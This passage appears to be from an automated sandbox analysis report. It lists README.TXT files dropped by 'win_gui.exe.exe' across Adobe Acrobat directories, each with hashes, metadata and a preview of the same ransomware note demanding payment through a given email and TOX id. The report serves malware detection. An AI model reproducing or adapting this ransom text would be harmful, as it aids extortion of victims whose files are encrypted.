                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win-scrollbar\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win-scrollbar\themes\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win8-scrollbar\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win8-scrollbar\themes\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app-api\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app-api\dev\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\0.2.2\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
